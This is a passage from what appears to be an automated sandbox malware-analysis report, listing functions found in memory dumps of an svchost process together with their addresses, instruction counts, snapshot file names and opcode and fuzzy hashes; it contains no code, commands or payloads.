                                • Opcode Fuzzy Hash: 5282cab5def97dfbc78c78d9491cf35de809e791444068990ac509dec0efd28a
                                • Instruction Fuzzy Hash: 6D01BCB65043448FCB119BA8F4467D97FF0FB0A228F204846E459DBA01D7389880CB92
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0592ED00, Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: d
                                • API String ID: 0-2564639436
                                • Opcode ID: 4002e76acf915aec605c03d76f80ef93f70be45a70b44b81e1be3c34688f802a
                                • Instruction ID: c85dfad7c5c50147e6346ebcec467ecd5146c278fb4b0df1e3fd3e03ab0467d1
                                • Opcode Fuzzy Hash: 4002e76acf915aec605c03d76f80ef93f70be45a70b44b81e1be3c34688f802a
                                • Instruction Fuzzy Hash: 48615874A00A168FCB14DF59D4C08AAFBBAFF88310B54C969C9199B719DB30F855CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05921518, Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: P@2l
                                • API String ID: 0-866591868
                                • Opcode ID: 9012ed50b38c3e6aca186679d746629fadb5850b639b655dff3c024591cf22ec
                                • Instruction ID: f028e45a018d070f2442e76cc1a4f71cb70d22a7ca47d2c4f234bee08f9457bf
                                • Opcode Fuzzy Hash: 9012ed50b38c3e6aca186679d746629fadb5850b639b655dff3c024591cf22ec
                                • Instruction Fuzzy Hash: D921DD31B002148BCB259B74D014AAEB7F7AB88610F1889ADD406EB388DF34CD02DBD2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05921528, Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: P@2l
                                • API String ID: 0-866591868
                                • Opcode ID: 5b5fe3e52c2e3aad0fec85521c53993a388df102386eda8e2de33a70da6fb8cb
                                • Instruction ID: c3c0b17faab7488430d7664a6f3e7661b7f2f5c2872b4d16f9f4dff8da957962
                                • Opcode Fuzzy Hash: 5b5fe3e52c2e3aad0fec85521c53993a388df102386eda8e2de33a70da6fb8cb
                                • Instruction Fuzzy Hash: B1218D31B001148FCB25AB64D114AAFB7F7AB88640F14856DD406EB388DF74CC42DBA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05920FD0, Relevance: .4, Instructions: 408COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 237fe8fb12a5f30981a398237586b216b8ca1c569b441f66dae499fb02e41b79
                                • Instruction ID: 71d60a093040db715dfe12fd1b602aaf2c438abf5396dc1ff5999675cc72a322
                                • Opcode Fuzzy Hash: 237fe8fb12a5f30981a398237586b216b8ca1c569b441f66dae499fb02e41b79
                                • Instruction Fuzzy Hash: D0F15B357001049FCB15DFA8D844E6ABBA7FF88314B1580A8E60A9F376DB36DC16DB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05920FA8, Relevance: .4, Instructions: 394COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 554563ee62b051d1127890921536972b9d3a59f58ab8ff5268f0a3d1113e1ef7
                                • Instruction ID: 69c26d470a43be2c8c47fbbdf7a238fdf6664bcff5065a8d7737ca9ad980243f
                                • Opcode Fuzzy Hash: 554563ee62b051d1127890921536972b9d3a59f58ab8ff5268f0a3d1113e1ef7
                                • Instruction Fuzzy Hash: 5BE14C75B001049FCB15DFA8D844E6ABBA7FF88314B1580A8E2099F376DB36DC16DB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0592AA70, Relevance: .2, Instructions: 230COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ff1e17feef547a167e0fafb56dd91b9ada5d1a23b7b4af08eb7782284d71037c
                                • Instruction ID: 410f9a7bb2d07530bb1acfe99987c501991f52447d99eec9d5b40eb134236ebd
                                • Opcode Fuzzy Hash: ff1e17feef547a167e0fafb56dd91b9ada5d1a23b7b4af08eb7782284d71037c
                                • Instruction Fuzzy Hash: 55A14B746007028FC704EF68D48895ABBB2FF896247558998E54ADB375DF30FD46CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0592FD70, Relevance: .2, Instructions: 221COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ea41a16526a6b3c11827f8c0eaaadfc0d6a9b5ed0ae1b40ff195c17accd66788
                                • Instruction ID: bc2cecd0c105edef31ecb2df702ccc79aea9c6b39090d70f85f1bae23f362dd3
                                • Opcode Fuzzy Hash: ea41a16526a6b3c11827f8c0eaaadfc0d6a9b5ed0ae1b40ff195c17accd66788
                                • Instruction Fuzzy Hash: F1618C75B002159FCB04AFA9D8586AEBBB7FFC8710F508429E906D7384DF359C428B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0592F6A0, Relevance: .2, Instructions: 207COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d9b4ee75feb74c01bdee4784edea6b493c47905861cadfd3e94da9f362176335
                                • Instruction ID: 46e7288ce0485f6b1d118f739a558dcfbc2452429c83a254b72cf195674506d6
                                • Opcode Fuzzy Hash: d9b4ee75feb74c01bdee4784edea6b493c47905861cadfd3e94da9f362176335
                                • Instruction Fuzzy Hash: 2D71B039A041119BDB04FB64E4894ACBBB3FF80624346CD59C546EF219EF34AE068BE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0592CA48, Relevance: .2, Instructions: 178COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c28c07f88933fb240ed817f755d56292dd4d3e73a26aec286dd930174f7a3df5
                                • Instruction ID: 30c4ebfef80fb87bbe9625f1147a70a9e997442049ac452a9ac27f352c610508
                                • Opcode Fuzzy Hash: c28c07f88933fb240ed817f755d56292dd4d3e73a26aec286dd930174f7a3df5
                                • Instruction Fuzzy Hash: F5619B71A0061A9FC714DF58D884AAEF7B6FF84324B25C928D5199B214DB31FC46CBE0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0592F4E8, Relevance: .2, Instructions: 158COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d35cc5d5b37b3ac23a62fd9dc84b198a85cff2a0dbc1a67f9b25c53b9478a9c6
                                • Instruction ID: 4b122c5acf24a8f4764cf4827b9e1d59c603035128161eadb080c1abda9250e3
                                • Opcode Fuzzy Hash: d35cc5d5b37b3ac23a62fd9dc84b198a85cff2a0dbc1a67f9b25c53b9478a9c6
                                • Instruction Fuzzy Hash: 5751F7317047208FC725DB65E485A2AB7FAEFC572071988AED549DB759CB30EC02CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0592E278, Relevance: .1, Instructions: 118COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 099d18eff27d05baed7ed0f3af1fbaa2932cfaad43eda23aaa435cc7037db405
                                • Instruction ID: b73b831b046bd210357ac4da08cab73170a65194833515543cbf88b89becc67d
                                • Opcode Fuzzy Hash: 099d18eff27d05baed7ed0f3af1fbaa2932cfaad43eda23aaa435cc7037db405
                                • Instruction Fuzzy Hash: D5418C342007018FD314EBB4E499A1AB7E3FBC8624B548E6CE14A8B654DF75E946CBE0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0592D280, Relevance: .1, Instructions: 112COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ef8c3b3b6eed7678705282767d343465cc24ef23ab6d51486b4268daf8825a96
                                • Instruction ID: d8d0eb898a4135ab1c9b2b0cb835d1697fcbe3b2b4410f24339df7907c8ec248
                                • Opcode Fuzzy Hash: ef8c3b3b6eed7678705282767d343465cc24ef23ab6d51486b4268daf8825a96
                                • Instruction Fuzzy Hash: DD418F702007415FD354EF25D484A5AB7B3BF81A24F91CD5CC24A8B6A5CF74F90A8BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 059205C7, Relevance: .1, Instructions: 102COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3f3c0c5ac5dd7a38f7c931332e077f63498c0bb1daaad6ecd14538522c6de8b4
                                • Instruction ID: b0b2ff6513ca83d73ddbac65e5a8c252ba0b96d745c6855e5d535851abdf3bd1
                                • Opcode Fuzzy Hash: 3f3c0c5ac5dd7a38f7c931332e077f63498c0bb1daaad6ecd14538522c6de8b4
                                • Instruction Fuzzy Hash: 99315A34B501149FCB14DFA9C498AAEBBF6AF8C714F158169E506DB7A4CBB0EC01CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 059205D8, Relevance: .1, Instructions: 96COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 11a8f2450b03ea90e84530194d1ddcb96b01635d430de03014bbebc747233cbc
                                • Instruction ID: c301ceff4db4c0bb6ce6a1aad6e7da18d8da03358efde1ea1ed5b5b1db64091b
                                • Opcode Fuzzy Hash: 11a8f2450b03ea90e84530194d1ddcb96b01635d430de03014bbebc747233cbc
                                • Instruction Fuzzy Hash: 13315930B101148FCB14DFA9C498A6EBBF6AF8C714F258169E506DB7A4CBB0EC01CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05920A28, Relevance: .1, Instructions: 95COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cac97410329daaf3c252bfb9e6b266431a8a53c284c78defadc3c9029f9655e7
                                • Instruction ID: 392684285c2d47bb57a24cab5a0193d83f243bf5695f1910d1801693f4ec17b6
                                • Opcode Fuzzy Hash: cac97410329daaf3c252bfb9e6b266431a8a53c284c78defadc3c9029f9655e7
                                • Instruction Fuzzy Hash: 3B317F31B002185FD705A6B9885467FB6BBEBC8A20F64802DA505E7784CE75DD074B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0592D830, Relevance: .1, Instructions: 81COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7ef74fcdfff3f6c859495bdec4fcb59bbcb8fc10b59d0c519ccdefada028a43d
                                • Instruction ID: 46be71e17559bd80eb85c4b7750e4d60191f18552258c257d751da738287bebd
                                • Opcode Fuzzy Hash: 7ef74fcdfff3f6c859495bdec4fcb59bbcb8fc10b59d0c519ccdefada028a43d
                                • Instruction Fuzzy Hash: DF2171347406011BE708BA72E89973E66A3EBD1A34F69CD2CD6029B284DE759D0B57E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0179D110, Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.757173047.000000000179D000.00000040.00000001.sdmp, Offset: 0179D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_179d000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6fb727080ca5cac46c23bb04cb42a2794e17f0e0e39978d52b54e4254fff266a
                                • Instruction ID: 1e46070bb0e2cb818e78c36e82880d2448b665adf9724c6b1168e2bec639ae77
                                • Opcode Fuzzy Hash: 6fb727080ca5cac46c23bb04cb42a2794e17f0e0e39978d52b54e4254fff266a
                                • Instruction Fuzzy Hash: 5E2125B6544204DFDF25CF94E9C0B26FB66FB84314F25C5ADD9094B246C336D84ACA61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0592EF48, Relevance: .1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 406e6e4899408dc320f50b8eb8d19952f5ace503e252c4c7bbbf02dd6fa20894
                                • Instruction ID: 5a80da6662618f677510aa6e50fe333c7d687627ccbd42083c1e84629b684ab3
                                • Opcode Fuzzy Hash: 406e6e4899408dc320f50b8eb8d19952f5ace503e252c4c7bbbf02dd6fa20894
                                • Instruction Fuzzy Hash: 5911C4316086158FC711DB14D480DA5FBEEEF45314729C966E41AC7746DB30FC068B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 059208C0, Relevance: .1, Instructions: 60COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6a0b8983eac5e8d036e77ca8d719f96784b25e9390a902b2d0b3e03758979d85
                                • Instruction ID: 31f9addebad9d5ba483b25879959a3de05ede158dcd858d951527409cd719ebc
                                • Opcode Fuzzy Hash: 6a0b8983eac5e8d036e77ca8d719f96784b25e9390a902b2d0b3e03758979d85
                                • Instruction Fuzzy Hash: 4F21D574A04B158FD730DF39D848A6BBBF5BB48320B508F2D95ABC6698E770E544CB80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0592D948, Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3bfef8610c785d5937e2b09307f81c1bb87731b81caefd3d9961cc90ec24aed9
                                • Instruction ID: 7ffbf6d55e77f9b878ac2d935cb2eda8eb61e9034d1d26fa7c852d9f692666e9
                                • Opcode Fuzzy Hash: 3bfef8610c785d5937e2b09307f81c1bb87731b81caefd3d9961cc90ec24aed9
                                • Instruction Fuzzy Hash: F311A0757007118FD724EBA9D484D2FB7AAFFC4268B11892DE64A8B704DF71ED068B90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 059291E0, Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b42981f47197eab4905ed24ab45ae581946c5fcf555888cab39354f47f35ef27
                                • Instruction ID: 26c850e012a1c1e35f380cd353de6bca3c6162e931f11ea29d439ef3dc93d5a9
                                • Opcode Fuzzy Hash: b42981f47197eab4905ed24ab45ae581946c5fcf555888cab39354f47f35ef27
                                • Instruction Fuzzy Hash: 691125713046044BC710EFA9E481A6EB7A7BFC4624F908D2CE50A8B784DF70DC468BA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0179D10B, Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.757173047.000000000179D000.00000040.00000001.sdmp, Offset: 0179D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_179d000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a4a6d69dcac19fdb8a3552707fc77d34c4a78638005edc64a4181cec70993955
                                • Instruction ID: 0299c79eb95d83b79f5b4d43d179efd131323e853e81489162c72fed89412d00
                                • Opcode Fuzzy Hash: a4a6d69dcac19fdb8a3552707fc77d34c4a78638005edc64a4181cec70993955
                                • Instruction Fuzzy Hash: 7E11D0B6544280CFDB16CF54E9C4B15FF71FB44314F24C6A9D8494B656C33AD44ACB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 059292A0, Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 584f45ae5fc74f013b5fbfcae12dadd5e3c2971298a4148251f9d76e647cfc70
                                • Instruction ID: 166c1dc43c52cad6f376661411c8516e8f086c79ac841a9a90d6bb9b20ad4710
                                • Opcode Fuzzy Hash: 584f45ae5fc74f013b5fbfcae12dadd5e3c2971298a4148251f9d76e647cfc70
                                • Instruction Fuzzy Hash: 48116D30A002198BCB14DF69D4586EEBBB6FF88610F14C429D402B7398DB709C85CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0592CC60, Relevance: .1, Instructions: 51COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 22773a5583e582e6cf353a3d814a5d221b4d5c6322f23d4d0396b14cffe3e18e
                                • Instruction ID: c8f3f3fedcb7927fc05227a92477494e9865339949e6077f5777325f9a1ec140
                                • Opcode Fuzzy Hash: 22773a5583e582e6cf353a3d814a5d221b4d5c6322f23d4d0396b14cffe3e18e
                                • Instruction Fuzzy Hash: 63118C30200B014B8714EB68E48485AB7A7FFC1628364CEADD15A8B255DF71A94B8B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05920458, Relevance: .0, Instructions: 48COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c17c8a54a443c1f53c6873530dbd3139860aa071b7e7063a70b00618b80b0aaf
                                • Instruction ID: 546e249c1e7b94cd07624e6632d0e83b3f174f0e828e576bea68c87fd7182d05
                                • Opcode Fuzzy Hash: c17c8a54a443c1f53c6873530dbd3139860aa071b7e7063a70b00618b80b0aaf
                                • Instruction Fuzzy Hash: 4001843D34012467E60512A9AD11BBE215FD788B14F10405DE605EEBC5CEFE5C061792
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05928D47, Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cf9a0c4a889fba39c6f74984584a0927c5428e46690d827655d81c3d33d79c7e
                                • Instruction ID: 4a7b69b35c03e40f113a7d163e2a32e0584853e65d94c111c9eed333371d4cc5
                                • Opcode Fuzzy Hash: cf9a0c4a889fba39c6f74984584a0927c5428e46690d827655d81c3d33d79c7e
                                • Instruction Fuzzy Hash: 80F02877B053266BEB1048879854BBF7A5BEBD4661F494029FE0682244D526CC56F3A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05920468, Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2b0d93deba6d3ff8f7006ac92e47fa14dd568e1290b360c3ca5b21706115942c
                                • Instruction ID: cd3deca02cbc8f275ee963cd399868801ec1442b1f656dfe1835dd70e2d8f0b5
                                • Opcode Fuzzy Hash: 2b0d93deba6d3ff8f7006ac92e47fa14dd568e1290b360c3ca5b21706115942c
                                • Instruction Fuzzy Hash: 45F0AF3D34012467EA0826A9AD11BBE316FEB88F04F10805DE605BEBC9CEFF6C051796
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05928DC8, Relevance: .0, Instructions: 37COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cd8c52ad1d618155d62a7f3cf6aa5df6632a38e0b1aa08b20f815615964f6711
                                • Instruction ID: 8ef99a2899d9d836ae2cffa7c7bed74b5033a2657f500cf77e1236313de644ae
                                • Opcode Fuzzy Hash: cd8c52ad1d618155d62a7f3cf6aa5df6632a38e0b1aa08b20f815615964f6711
                                • Instruction Fuzzy Hash: 66F09EB3F083B05BEB110AD46C445393F57FAE25A0349455AED06C7114D631CC17F390
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05920561, Relevance: .0, Instructions: 30COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7a1d6dfa5f07703258e1f6ffcd4eaa401b6f6914be43863a90da2db5c76a949f
                                • Instruction ID: 0aa216043bcafbc3d2e7e8cc2999090a6b6b7369b7a1a517ce1ece48ad4d1ccb
                                • Opcode Fuzzy Hash: 7a1d6dfa5f07703258e1f6ffcd4eaa401b6f6914be43863a90da2db5c76a949f
                                • Instruction Fuzzy Hash: 59F0BE312045109FC725DB2AE484AB977E9EF89618F1550B9D50ACF3E2CF26CC468B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05920260, Relevance: .0, Instructions: 24COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b2ed45ac108957b3ac00e26bfe4d40367bddaff9c9359dfb9128a46ab03797a8
                                • Instruction ID: 82576e6a3ac1b9daebff0ac23331621428312183cdd608794e2968fa6017f790
                                • Opcode Fuzzy Hash: b2ed45ac108957b3ac00e26bfe4d40367bddaff9c9359dfb9128a46ab03797a8
                                • Instruction Fuzzy Hash: 93E026303402205FC710EB79D804F7977E99F8CA20F1480A9FA4ACB3E1EA20AC41CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05920B58, Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 488b7061a993d1a6a3265a333fba16e1cd8cddf045bd36018731a91fe9b966cd
                                • Instruction ID: 4c0cbcef1d9b0a0569be183d842d2d6b7ce1372bf366c0152fb3d63c0b8fe1e9
                                • Opcode Fuzzy Hash: 488b7061a993d1a6a3265a333fba16e1cd8cddf045bd36018731a91fe9b966cd
                                • Instruction Fuzzy Hash: F4E04F3094924DAFCB50EF68E90259DBBB9EF06614B1044EDD80CD7262EA356E099B92
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05920522, Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3e2ee11105c03ec0d668f086527a77152386c8de133bcad028498de07b7d1fb9
                                • Instruction ID: 863a6fb95827a107c197e480fb69133a613e145cefe1c3cff530ce43bc04328a
                                • Opcode Fuzzy Hash: 3e2ee11105c03ec0d668f086527a77152386c8de133bcad028498de07b7d1fb9
                                • Instruction Fuzzy Hash: 3AE0C2353841544FD7468B68E842B2937A9EB48724F5040B9ED09CF3E2CF39EC428E51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0592DA30, Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f981774fade76aa8508cae10562dc3b4a7b8e5b6b4fec48758a06d6c9b141bc0
                                • Instruction ID: 42516659145d24d6277515009e8ea56331bc8ece2c3917651b534f35eecdf2c5
                                • Opcode Fuzzy Hash: f981774fade76aa8508cae10562dc3b4a7b8e5b6b4fec48758a06d6c9b141bc0
